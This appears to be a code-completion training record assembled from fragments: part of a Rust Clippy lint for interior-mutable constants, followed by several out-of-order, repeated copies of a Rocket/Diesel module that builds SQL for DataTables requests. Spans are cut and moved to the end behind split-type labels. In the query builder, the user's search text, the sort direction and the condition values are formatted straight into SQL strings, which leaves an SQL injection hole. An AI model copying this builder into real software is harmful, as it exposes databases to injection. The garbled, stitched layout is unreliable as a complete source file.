fn is_value_unfrozen_expr<'tcx>(cx: &LateContext<'tcx>, hir_id: HirId, def_id: DefId, ty: Ty<'tcx>) -> bool {
let substs = cx.typeck_results().node_substs(hir_id);
let result = cx.tcx.const_eval_resolve(
cx.param_env,
ty::Unevaluated::new(ty::WithOptConstParam::unknown(def_id), substs),
None,
);
is_value_unfrozen_raw(cx, result, ty)
}
#[derive(Copy, Clone)]
enum Source {
Item { item: Span },
Assoc { item: Span },
Expr { expr: Span },
}
impl Source {
#[must_use]
fn lint(&self) -> (&'static Lint, &'static str, Span) {
match self {
Self::Item { item } | Self::Assoc { item, .. } => (
DECLARE_INTERIOR_MUTABLE_CONST,
"a `const` item should never be interior mutable",
*item,
),
Self::Expr { expr } => (
BORROW_INTERIOR_MUTABLE_CONST,
"a `const` item with interior mutability should not be borrowed",
*expr,
),
}
}
}
fn lint(cx: &LateContext<'_>, source: Source) {
let (lint, msg, span) = source.lint();
span_lint_and_then(cx, lint, span, msg, |diag| {
if span.from_expansion() {
return; // Don't give suggestions into macros.
}
match source {
Source::Item { .. } => {
let const_kw_span = span.from_inner(InnerSpan::new(0, 5));
diag.span_label(const_kw_span, "make this a static item (maybe with lazy_static)");
},
Source::Assoc { .. } => (),
Source::Expr { .. } => {
diag.help("assign this const to a local or static variable, and use the variable here");
},
}
});
}
declare_lint_pass!(NonCopyConst => [DECLARE_INTERIOR_MUTABLE_CONST, BORROW_INTERIOR_MUTABLE_CONST]);
impl<'tcx> LateLintPass<'tcx> for NonCopyConst {
fn check_item(&mut self, cx: &LateContext<'tcx>, it: &'tcx Item<'_>) {
if let ItemKind::Const(hir_ty, body_id) = it.kind {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, body_id, ty) {
lint(cx, Source::Item { item: it.span });
}
}
}
fn check_trait_item(&mut self, cx: &LateContext<'tcx>, trait_item: &'tcx TraitItem<'_>) {
if let TraitItemKind::Const(hir_ty, body_id_opt) = &trait_item.kind {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
// Normalize assoc types because ones originated from generic params
// bounded other traits could have their bound.
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, normalized)
// When there's no default value, lint it only according to its type;
// in other words, lint consts whose value *could* be unfrozen, not definitely is.
// This feels inconsistent with how the lint treats generic types,
// which avoids linting types which potentially become unfrozen.
// One could check whether an unfrozen type have a *frozen variant*
// (like `body_id_opt.map_or_else(|| !has_frozen_variant(...), ...)`),
// and do the same as the case of generic types at impl items.
// Note that it isn't sufficient to check if it has an enum
// since all of that enum's variants can be unfrozen:
// i.e. having an enum doesn't necessary mean a type has a frozen variant.
// And, implementing it isn't a trivial task; it'll probably end up
// re-implementing the trait predicate evaluation specific to `Freeze`.
&& body_id_opt.map_or(true, |body_id| is_value_unfrozen_poly(cx, body_id, normalized))
{
lint(cx, Source::Assoc { item: trait_item.span });
}
}
}
fn check_impl_item(&mut self, cx: &LateContext<'tcx>, impl_item: &'tcx ImplItem<'_>) {
if let ImplItemKind::Const(hir_ty, body_id) = &impl_item.kind {
let item_hir_id = cx.tcx.hir().get_parent_node(impl_item.hir_id());
let item = cx.tcx.hir().expect_item(item_hir_id);
match &item.kind {
ItemKind::Impl(Impl {
of_trait: Some(of_trait_ref),
..
}) => {
if_chain! {
// Lint a trait impl item only when the definition is a generic type,
// assuming an assoc const is not meant to be an interior mutable type.
if let Some(of_trait_def_id) = of_trait_ref.trait_def_id();
if let Some(of_assoc_item) = specialization_graph::Node::Trait(of_trait_def_id)
.item(cx.tcx, impl_item.ident, AssocKind::Const, of_trait_def_id);
if cx
.tcx
.layout_of(cx.tcx.param_env(of_trait_def_id).and(
// Normalize assoc types because ones originated from generic params
// bounded other traits could have their bound at the trait defs;
// and, in that case, the definition is *not* generic.
cx.tcx.normalize_erasing_regions(
cx.tcx.param_env(of_trait_def_id),
cx.tcx.type_of(of_assoc_item.def_id),
),
))
.is_err();
// If there were a function like `has_frozen_variant` described above,
// we should use here as a frozen variant is a potential to be frozen
// similar to unknown layouts.
// e.g. `layout_of(...).is_err() || has_frozen_variant(...);`
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, normalized);
if is_value_unfrozen_poly(cx, *body_id, normalized);
then {
lint(
cx,
Source::Assoc {
item: impl_item.span,
},
);
}
}
},
ItemKind::Impl(Impl { of_trait: None, .. }) => {
let ty = hir_ty_to_ty(cx.tcx, hir_ty);
// Normalize assoc types originated from generic params.
let normalized = cx.tcx.normalize_erasing_regions(cx.param_env, ty);
if is_unfrozen(cx, ty) && is_value_unfrozen_poly(cx, *body_id, normalized) {
lint(cx, Source::Assoc { item: impl_item.span });
}
},
_ => (),
}
}
}
fn check_expr(&mut self, cx: &LateContext<'tcx>, expr: &'tcx Expr<'_>) {
if let ExprKind::Path(qpath) = &expr.kind {
// Only lint if we use the const item inside a function.
if in_constant(cx, expr.hir_id) {
return;
}
// Make sure it is a const item.
let item_def_id = match cx.qpath_res(qpath, expr.hir_id) {
Res::Def(DefKind::Const | DefKind::AssocConst, did) => did,
_ => return,
};
// Climb up to resolve any field access and explicit referencing.
let mut cur_expr = expr;
let mut dereferenced_expr = expr;
let mut needs_check_adjustment = true;
loop {
let parent_id = cx.tcx.hir().get_parent_node(cur_expr.hir_id);
if parent_id == cur_expr.hir_id {
break;
}
if let Some(Node::Expr(parent_expr)) = cx.tcx.hir().find(parent_id) {
match &parent_expr.kind {
ExprKind::AddrOf(..) => {
// `&e` => `e` must be referenced.
needs_check_adjustment = false;
},
ExprKind::Field(..) => {
needs_check_adjustment = true;
// Check whether implicit dereferences happened;
// if so, no need to go further up
// because of the same reason as the `ExprKind::Unary` case.
if cx
.typeck_results()
.expr_adjustments(dereferenced_expr)
.iter()
.any(|adj| matches!(adj.kind, Adjust::Deref(_)))
{
break;
}
dereferenced_expr = parent_expr;
},
ExprKind::Index(e, _) if ptr::eq(&**e, cur_expr) => {
// `e[i]` => desugared to `*Index::index(&e, i)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
ExprKind::Unary(UnOp::Deref, _) => {
// `*e` => desugared to `*Deref::deref(&e)`,
// meaning `e` must be referenced.
// no need to go further up since a method call is involved now.
needs_check_adjustment = false;
break;
},
_ => break,
}
cur_expr = parent_expr;
} else {
break;
}
}
let ty = if needs_check_adjustment {
let adjustments = cx.typeck_results().expr_adjustments(dereferenced_expr);
if let Some(i) = adjustments
.iter()
.position(|adj| matches!(adj.kind, Adjust::Borrow(_) | Adjust::Deref(_)))
{
if i == 0 {
cx.typeck_results().expr_ty(dereferenced_expr)
} else {
adjustments[i - 1].target
}
} else {
// No borrow adjustments means the entire const is moved.
return;
}
} else {
cx.typeck_results().expr_ty(dereferenced_expr)
};
if is_unfrozen(cx, ty) && is_value_unfrozen_expr(cx, expr.hir_id, item_def_id, ty) {
lint(cx, Source::Expr { expr: expr.span });
}
}
}
} | /// Consts are copied everywhere they are referenced, i.e.,
/// every time you refer to the const a fresh instance of the `Cell` or `Mutex`
/// or `AtomicXxxx` will be created, which defeats the whole purpose of using
/// these types in the first place. | random_line_split |
lib.rs | /*
8888888b. 8888888b. d8888 88888888888 d8888 888888b. 888 8888888888 .d8888b.
888 Y88b 888 "Y88b d88888 888 d88888 888 "88b 888 888 d88P Y88b
888 888 888 888 d88P888 888 d88P888 888 .88P 888 888 Y88b.
888 d88P 888 888 d88P 888 888 d88P 888 8888888K. 888 8888888 "Y888b.
8888888P" 888 888 d88P 888 888 d88P 888 888 "Y88b 888 888 "Y88b.
888 T88b 888888 888 888 d88P 888 888 d88P 888 888 888 888 888 "888
888 T88b 888 .d88P d8888888888 888 d8888888888 888 d88P 888 888 Y88b d88P
888 T88b 8888888P" d88P 888 888 d88P 888 8888888P" 88888888 8888888888 "Y8888P"
*/
/* Form diesel and serve imports */
use diesel::*;
use rocket::request::{FormItems, FromForm};
use serde::Serialize;
use diesel::sql_types::BigInt;
/* This one stands for the r-datatables counting struct */
#[derive(QueryableByName, Serialize)]
pub struct Count {
#[sql_type = "BigInt"]
pub count: i64,
}
/*
"Tables" explanation:
===================
-> Data Structure comes like:
(JoinType, (dest_table_name, dest_table_key), (origin_table_name, origin_table_key))
-> Implemented Struct will return something like:
"
`JoinType` JOIN `dest_table_name`
ON `origin_table_name`.`origin_table_key` = `table2`.`common_field` *( n-th)
"
*/
#[derive(Debug, Clone)]
pub struct Tables<'a> {
pub origin: (&'a str, &'a str), /* From */
pub fields: Vec<&'a str>, /* Fields to seek for */
pub join_targets: Option<Vec<(&'a str, (&'a str, &'a str), (&'a str, &'a str))>>, /* Join Targets explained over here */
pub datatables_post_query: DataTableQuery, /* Incoming Query */
pub query: Option<String>, /* Our builded query holder */
pub condition: Option<Vec<(&'a str, &'a str, &'a str)>>, /* (And/Or, Field_Name, Value) */
pub distinct: Option<bool>,
}
impl<'a> Tables<'a> {
pub fn generate(&mut self) -> String {
match self.datatables_post_query.order[0].0 {
Some(column_index_to_order) => format!(
"{} ORDER BY {} {}",
self.select().join().where_like().condition().query.to_owned().unwrap(),
self.fields[column_index_to_order as usize],
&self.datatables_post_query.order[0]
.1
.as_ref()
.unwrap()
.to_uppercase()
),
None => self.select().join().where_like().condition().query.to_owned().unwrap(),
}
}
/* Returns fields for the query */
pub fn select(&mut self) -> Self {
let stmt = &self
.fields
.iter()
.map(|field| format!("{}, ", field))
.collect::<String>();
self.query = Some(
format!("SELECT {} {} FROM {}",
match self.distinct {
Some(_) => {"DISTINCT"}
None => {""}
},
stmt[..(stmt.len() - 2)].to_owned(),
self.origin.0
)
.to_owned(),
);
self.to_owned()
}
pub fn where_like(&mut self) -> Self {
/* #Where like:
## This function receives self (as all of the SQL generators) and
reparses the content of "where" from the incoming Datatable query
to do a seeking for desired information over all table fields
returns... gues what? self!
*/
let stmt = self
.fields
.iter()
.map(|field| {
format!(
" CAST({} as TEXT) LIKE '%{}%' OR",
field,
self.datatables_post_query.search[0].0.as_ref().unwrap()
)
})
.collect::<String>();
self.query = Some(
format!(
"{} WHERE ({})",
self.query.to_owned().unwrap(),
stmt[..(stmt.len() - 2)].to_owned()
)
.to_owned(),
);
self.to_owned()
}
pub fn join(&mut self) -> Self {
/*
# How this works?
## We will match the existing needing of appending the "join statement" or not
As well we do on other self sql generators functions, we'll opt to not do an if stmt
for seeking the "last" target and doing a exactly cut for the string to append.
Returns self.
*/
match self.join_targets {
Some(_) => {
let stmt = self
.join_targets
.as_ref()
.unwrap()
.iter()
.map(|(join_type, (target, target_key), (origin, origin_key))| {
format!(
"{} JOIN {} ON {}.{} = {}.{} ",
join_type.to_uppercase(), target, origin, origin_key, target, target_key,
)
})
.collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => self.to_owned(),
}
}
pub fn condition(&mut self) -> Self {
match self.condition {
Some(_) => {
let stmt = self.condition.as_ref().unwrap().iter().map(|(sub_cond, target, value)| {
format!("{} {} = '{}'", sub_cond.to_uppercase(), target, &value.to_string())
}).collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => {
self.to_owned() | }
}
}
}
#[allow(non_snake_case)]
#[derive(Debug, Clone)]
pub struct DataTableQuery {
pub draw: i32, /* Stands for the n-th time that we're drawing */
pub columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)>,
pub order: Vec<(Option<i32>, Option<String>)>,
pub start: i32, /* How much to skip */
pub length: i32, /* How much to retrieve */
pub search: Vec<(Option<String>, bool)>,
pub info: Option<i32>,
}
impl<'f> FromForm<'f> for DataTableQuery {
// In practice, we'd use a more descriptive error type.
type Error = ();
fn from_form(items: &mut FormItems<'f>, strict: bool) -> Result<DataTableQuery, ()> {
let mut draw: Option<i32> = None;
let mut start: Option<i32> = None;
let mut length: Option<i32> = None;
let tmp_columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)> = vec![(None, None, None, None, None, None)];
let mut order_tuple: (Option<i32>, Option<String>) = (None, None);
let mut search_value: Option<String> = None;
let mut time_stamp: Option<i32> = None;
for item in items {
match item.key.as_str() {
"draw" if draw.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
draw = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"start" if start.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
start = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"length" if length.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
length = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"search%5Bvalue%5D" if search_value.is_none() => {
let decoded = Some(item.value.url_decode().map_err(|_| ())?);
search_value = decoded;
}
key if key.contains("order%5B0%5D") => {
if key.contains("order%5B0%5D%5Bcolumn%5D") {
order_tuple.0 = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
} else {
order_tuple.1 = Some(item.value.url_decode().map_err(|_| ())?);
}
}
"_" => {
time_stamp = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
}
_ if strict => return Err(()),
_ => {}
}
}
Ok(DataTableQuery {
draw: match draw {
Some(value) => value,
None => 0,
},
columns: tmp_columns[1..].to_owned(),
order: vec![order_tuple],
start: match start {
Some(value) => value,
None => 0,
},
length: match length {
Some(value) => value,
None => 0,
},
search: vec![(search_value, false)],
info: time_stamp.to_owned(),
})
}
}
#[allow(non_snake_case)]
#[derive(Debug, Serialize)]
pub struct OutcomeData<T> {
pub draw: i32,
pub recordsTotal: i64,
pub recordsFiltered: i32,
pub data: Vec<T>,
}
pub fn datatables_query<
T: diesel::deserialize::QueryableByName<diesel::pg::Pg> + std::fmt::Debug + std::clone::Clone,
>(
table: Tables,
conn: PgConnection,
) -> OutcomeData<T> {
println!("{}", table.clone().generate());
let (data_results, total_data): (Vec<T>, Count) = (
sql_query(table.clone().generate())
.load(&conn)
.expect("Failed to retrieve information"),
sql_query(format!("SELECT COUNT(*) FROM {}", table.origin.0))
.load::<Count>(&conn)
.expect("Query failed")
.pop()
.expect("No rows"),
);
let tmp_results = data_results[(table.datatables_post_query.start as usize)..].to_vec();
OutcomeData::<T> {
draw: table.datatables_post_query.draw, /* N-th draw */
recordsTotal: total_data.count, /* How much we have on this table */
recordsFiltered: data_results.len() as i32, /* How much query has returned */
data: if tmp_results.len() >= (table.datatables_post_query.length as usize) {
tmp_results[..(table.datatables_post_query.length as usize)].to_vec()
} else {
tmp_results.to_vec()
},
}
} | random_line_split | |
lib.rs |
/*
8888888b. 8888888b. d8888 88888888888 d8888 888888b. 888 8888888888 .d8888b.
888 Y88b 888 "Y88b d88888 888 d88888 888 "88b 888 888 d88P Y88b
888 888 888 888 d88P888 888 d88P888 888 .88P 888 888 Y88b.
888 d88P 888 888 d88P 888 888 d88P 888 8888888K. 888 8888888 "Y888b.
8888888P" 888 888 d88P 888 888 d88P 888 888 "Y88b 888 888 "Y88b.
888 T88b 888888 888 888 d88P 888 888 d88P 888 888 888 888 888 "888
888 T88b 888 .d88P d8888888888 888 d8888888888 888 d88P 888 888 Y88b d88P
888 T88b 8888888P" d88P 888 888 d88P 888 8888888P" 88888888 8888888888 "Y8888P"
*/
/* Form diesel and serve imports */
use diesel::*;
use rocket::request::{FormItems, FromForm};
use serde::Serialize;
use diesel::sql_types::BigInt;
/* This one stands for the r-datatables counting struct */
#[derive(QueryableByName, Serialize)]
pub struct Count {
#[sql_type = "BigInt"]
pub count: i64,
}
/*
"Tables" explanation:
===================
-> Data Structure comes like:
(JoinType, (dest_table_name, dest_table_key), (origin_table_name, origin_table_key))
-> Implemented Struct will return something like:
"
`JoinType` JOIN `dest_table_name`
ON `origin_table_name`.`origin_table_key` = `table2`.`common_field` *( n-th)
"
*/
#[derive(Debug, Clone)]
pub struct Tables<'a> {
pub origin: (&'a str, &'a str), /* From */
pub fields: Vec<&'a str>, /* Fields to seek for */
pub join_targets: Option<Vec<(&'a str, (&'a str, &'a str), (&'a str, &'a str))>>, /* Join Targets explained over here */
pub datatables_post_query: DataTableQuery, /* Incoming Query */
pub query: Option<String>, /* Our builded query holder */
pub condition: Option<Vec<(&'a str, &'a str, &'a str)>>, /* (And/Or, Field_Name, Value) */
pub distinct: Option<bool>,
}
impl<'a> Tables<'a> {
pub fn generate(&mut self) -> String {
match self.datatables_post_query.order[0].0 {
Some(column_index_to_order) => format!(
"{} ORDER BY {} {}",
self.select().join().where_like().condition().query.to_owned().unwrap(),
self.fields[column_index_to_order as usize],
&self.datatables_post_query.order[0]
.1
.as_ref()
.unwrap()
.to_uppercase()
),
None => self.select().join().where_like().condition().query.to_owned().unwrap(),
}
}
/* Returns fields for the query */
pub fn select(&mut self) -> Self {
let stmt = &self
.fields
.iter()
.map(|field| format!("{}, ", field))
.collect::<String>();
self.query = Some(
format!("SELECT {} {} FROM {}",
match self.distinct {
Some(_) => {"DISTINCT"}
None => {""}
},
stmt[..(stmt.len() - 2)].to_owned(),
self.origin.0
)
.to_owned(),
);
self.to_owned()
}
pub fn where_like(&mut self) -> Self {
/* #Where like:
## This function receives self (as all of the SQL generators) and
reparses the content of "where" from the incoming Datatable query
to do a seeking for desired information over all table fields
returns... gues what? self!
*/
let stmt = self
.fields
.iter()
.map(|field| {
format!(
" CAST({} as TEXT) LIKE '%{}%' OR",
field,
self.datatables_post_query.search[0].0.as_ref().unwrap()
)
})
.collect::<String>();
self.query = Some(
format!(
"{} WHERE ({})",
self.query.to_owned().unwrap(),
stmt[..(stmt.len() - 2)].to_owned()
)
.to_owned(),
);
self.to_owned()
}
pub fn join(&mut self) -> Self {
/*
# How this works?
## We will match the existing needing of appending the "join statement" or not
As well we do on other self sql generators functions, we'll opt to not do an if stmt
for seeking the "last" target and doing a exactly cut for the string to append.
Returns self.
*/
match self.join_targets {
Some(_) => {
let stmt = self
.join_targets
.as_ref()
.unwrap()
.iter()
.map(|(join_type, (target, target_key), (origin, origin_key))| {
format!(
"{} JOIN {} ON {}.{} = {}.{} ",
join_type.to_uppercase(), target, origin, origin_key, target, target_key,
)
})
.collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => self.to_owned(),
}
}
pub fn condition(&mut self) -> Self {
match self.condition {
Some(_) => {
let stmt = self.condition.as_ref().unwrap().iter().map(|(sub_cond, target, value)| {
format!("{} {} = '{}'", sub_cond.to_uppercase(), target, &value.to_string())
}).collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => {
self.to_owned()
}
}
}
}
#[allow(non_snake_case)]
#[derive(Debug, Clone)]
pub struct DataTableQuery {
pub draw: i32, /* Stands for the n-th time that we're drawing */
pub columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)>,
pub order: Vec<(Option<i32>, Option<String>)>,
pub start: i32, /* How much to skip */
pub length: i32, /* How much to retrieve */
pub search: Vec<(Option<String>, bool)>,
pub info: Option<i32>,
}
impl<'f> FromForm<'f> for DataTableQuery {
// In practice, we'd use a more descriptive error type.
type Error = ();
fn from_form(items: &mut FormItems<'f>, strict: bool) -> Result<DataTableQuery, ()> {
let mut draw: Option<i32> = None;
let mut start: Option<i32> = None;
let mut length: Option<i32> = None;
let tmp_columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)> = vec![(None, None, None, None, None, None)];
let mut order_tuple: (Option<i32>, Option<String>) = (None, None);
let mut search_value: Option<String> = None;
let mut time_stamp: Option<i32> = None;
for item in items {
match item.key.as_str() {
"draw" if draw.is_none() => |
"start" if start.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
start = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"length" if length.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
length = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"search%5Bvalue%5D" if search_value.is_none() => {
let decoded = Some(item.value.url_decode().map_err(|_| ())?);
search_value = decoded;
}
key if key.contains("order%5B0%5D") => {
if key.contains("order%5B0%5D%5Bcolumn%5D") {
order_tuple.0 = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
} else {
order_tuple.1 = Some(item.value.url_decode().map_err(|_| ())?);
}
}
"_" => {
time_stamp = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
}
_ if strict => return Err(()),
_ => {}
}
}
Ok(DataTableQuery {
draw: match draw {
Some(value) => value,
None => 0,
},
columns: tmp_columns[1..].to_owned(),
order: vec![order_tuple],
start: match start {
Some(value) => value,
None => 0,
},
length: match length {
Some(value) => value,
None => 0,
},
search: vec![(search_value, false)],
info: time_stamp.to_owned(),
})
}
}
#[allow(non_snake_case)]
#[derive(Debug, Serialize)]
pub struct OutcomeData<T> {
pub draw: i32,
pub recordsTotal: i64,
pub recordsFiltered: i32,
pub data: Vec<T>,
}
pub fn datatables_query<
T: diesel::deserialize::QueryableByName<diesel::pg::Pg> + std::fmt::Debug + std::clone::Clone,
>(
table: Tables,
conn: PgConnection,
) -> OutcomeData<T> {
println!("{}", table.clone().generate());
let (data_results, total_data): (Vec<T>, Count) = (
sql_query(table.clone().generate())
.load(&conn)
.expect("Failed to retrieve information"),
sql_query(format!("SELECT COUNT(*) FROM {}", table.origin.0))
.load::<Count>(&conn)
.expect("Query failed")
.pop()
.expect("No rows"),
);
let tmp_results = data_results[(table.datatables_post_query.start as usize)..].to_vec();
OutcomeData::<T> {
draw: table.datatables_post_query.draw, /* N-th draw */
recordsTotal: total_data.count, /* How much we have on this table */
recordsFiltered: data_results.len() as i32, /* How much query has returned */
data: if tmp_results.len() >= (table.datatables_post_query.length as usize) {
tmp_results[..(table.datatables_post_query.length as usize)].to_vec()
} else {
tmp_results.to_vec()
},
}
}
| {
let decoded = item.value.url_decode().map_err(|_| ())?;
draw = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
} | conditional_block |
lib.rs |
/*
8888888b. 8888888b. d8888 88888888888 d8888 888888b. 888 8888888888 .d8888b.
888 Y88b 888 "Y88b d88888 888 d88888 888 "88b 888 888 d88P Y88b
888 888 888 888 d88P888 888 d88P888 888 .88P 888 888 Y88b.
888 d88P 888 888 d88P 888 888 d88P 888 8888888K. 888 8888888 "Y888b.
8888888P" 888 888 d88P 888 888 d88P 888 888 "Y88b 888 888 "Y88b.
888 T88b 888888 888 888 d88P 888 888 d88P 888 888 888 888 888 "888
888 T88b 888 .d88P d8888888888 888 d8888888888 888 d88P 888 888 Y88b d88P
888 T88b 8888888P" d88P 888 888 d88P 888 8888888P" 88888888 8888888888 "Y8888P"
*/
/* Form diesel and serve imports */
use diesel::*;
use rocket::request::{FormItems, FromForm};
use serde::Serialize;
use diesel::sql_types::BigInt;
/* This one stands for the r-datatables counting struct */
#[derive(QueryableByName, Serialize)]
pub struct Count {
#[sql_type = "BigInt"]
pub count: i64,
}
/*
"Tables" explanation:
===================
-> Data Structure comes like:
(JoinType, (dest_table_name, dest_table_key), (origin_table_name, origin_table_key))
-> Implemented Struct will return something like:
"
`JoinType` JOIN `dest_table_name`
ON `origin_table_name`.`origin_table_key` = `table2`.`common_field` *( n-th)
"
*/
#[derive(Debug, Clone)]
pub struct Tables<'a> {
pub origin: (&'a str, &'a str), /* From */
pub fields: Vec<&'a str>, /* Fields to seek for */
pub join_targets: Option<Vec<(&'a str, (&'a str, &'a str), (&'a str, &'a str))>>, /* Join Targets explained over here */
pub datatables_post_query: DataTableQuery, /* Incoming Query */
pub query: Option<String>, /* Our builded query holder */
pub condition: Option<Vec<(&'a str, &'a str, &'a str)>>, /* (And/Or, Field_Name, Value) */
pub distinct: Option<bool>,
}
impl<'a> Tables<'a> {
pub fn generate(&mut self) -> String {
match self.datatables_post_query.order[0].0 {
Some(column_index_to_order) => format!(
"{} ORDER BY {} {}",
self.select().join().where_like().condition().query.to_owned().unwrap(),
self.fields[column_index_to_order as usize],
&self.datatables_post_query.order[0]
.1
.as_ref()
.unwrap()
.to_uppercase()
),
None => self.select().join().where_like().condition().query.to_owned().unwrap(),
}
}
/* Returns fields for the query */
pub fn select(&mut self) -> Self {
let stmt = &self
.fields
.iter()
.map(|field| format!("{}, ", field))
.collect::<String>();
self.query = Some(
format!("SELECT {} {} FROM {}",
match self.distinct {
Some(_) => {"DISTINCT"}
None => {""}
},
stmt[..(stmt.len() - 2)].to_owned(),
self.origin.0
)
.to_owned(),
);
self.to_owned()
}
pub fn where_like(&mut self) -> Self {
/* #Where like:
## This function receives self (as all of the SQL generators) and
reparses the content of "where" from the incoming Datatable query
to do a seeking for desired information over all table fields
returns... gues what? self!
*/
let stmt = self
.fields
.iter()
.map(|field| {
format!(
" CAST({} as TEXT) LIKE '%{}%' OR",
field,
self.datatables_post_query.search[0].0.as_ref().unwrap()
)
})
.collect::<String>();
self.query = Some(
format!(
"{} WHERE ({})",
self.query.to_owned().unwrap(),
stmt[..(stmt.len() - 2)].to_owned()
)
.to_owned(),
);
self.to_owned()
}
pub fn join(&mut self) -> Self |
pub fn condition(&mut self) -> Self {
match self.condition {
Some(_) => {
let stmt = self.condition.as_ref().unwrap().iter().map(|(sub_cond, target, value)| {
format!("{} {} = '{}'", sub_cond.to_uppercase(), target, &value.to_string())
}).collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => {
self.to_owned()
}
}
}
}
#[allow(non_snake_case)]
#[derive(Debug, Clone)]
pub struct DataTableQuery {
pub draw: i32, /* Stands for the n-th time that we're drawing */
pub columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)>,
pub order: Vec<(Option<i32>, Option<String>)>,
pub start: i32, /* How much to skip */
pub length: i32, /* How much to retrieve */
pub search: Vec<(Option<String>, bool)>,
pub info: Option<i32>,
}
impl<'f> FromForm<'f> for DataTableQuery {
// In practice, we'd use a more descriptive error type.
type Error = ();
fn from_form(items: &mut FormItems<'f>, strict: bool) -> Result<DataTableQuery, ()> {
let mut draw: Option<i32> = None;
let mut start: Option<i32> = None;
let mut length: Option<i32> = None;
let tmp_columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)> = vec![(None, None, None, None, None, None)];
let mut order_tuple: (Option<i32>, Option<String>) = (None, None);
let mut search_value: Option<String> = None;
let mut time_stamp: Option<i32> = None;
for item in items {
match item.key.as_str() {
"draw" if draw.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
draw = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"start" if start.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
start = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"length" if length.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
length = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"search%5Bvalue%5D" if search_value.is_none() => {
let decoded = Some(item.value.url_decode().map_err(|_| ())?);
search_value = decoded;
}
key if key.contains("order%5B0%5D") => {
if key.contains("order%5B0%5D%5Bcolumn%5D") {
order_tuple.0 = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
} else {
order_tuple.1 = Some(item.value.url_decode().map_err(|_| ())?);
}
}
"_" => {
time_stamp = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
}
_ if strict => return Err(()),
_ => {}
}
}
Ok(DataTableQuery {
draw: match draw {
Some(value) => value,
None => 0,
},
columns: tmp_columns[1..].to_owned(),
order: vec![order_tuple],
start: match start {
Some(value) => value,
None => 0,
},
length: match length {
Some(value) => value,
None => 0,
},
search: vec![(search_value, false)],
info: time_stamp.to_owned(),
})
}
}
#[allow(non_snake_case)]
#[derive(Debug, Serialize)]
pub struct OutcomeData<T> {
pub draw: i32,
pub recordsTotal: i64,
pub recordsFiltered: i32,
pub data: Vec<T>,
}
pub fn datatables_query<
T: diesel::deserialize::QueryableByName<diesel::pg::Pg> + std::fmt::Debug + std::clone::Clone,
>(
table: Tables,
conn: PgConnection,
) -> OutcomeData<T> {
println!("{}", table.clone().generate());
let (data_results, total_data): (Vec<T>, Count) = (
sql_query(table.clone().generate())
.load(&conn)
.expect("Failed to retrieve information"),
sql_query(format!("SELECT COUNT(*) FROM {}", table.origin.0))
.load::<Count>(&conn)
.expect("Query failed")
.pop()
.expect("No rows"),
);
let tmp_results = data_results[(table.datatables_post_query.start as usize)..].to_vec();
OutcomeData::<T> {
draw: table.datatables_post_query.draw, /* N-th draw */
recordsTotal: total_data.count, /* How much we have on this table */
recordsFiltered: data_results.len() as i32, /* How much query has returned */
data: if tmp_results.len() >= (table.datatables_post_query.length as usize) {
tmp_results[..(table.datatables_post_query.length as usize)].to_vec()
} else {
tmp_results.to_vec()
},
}
}
| {
/*
# How this works?
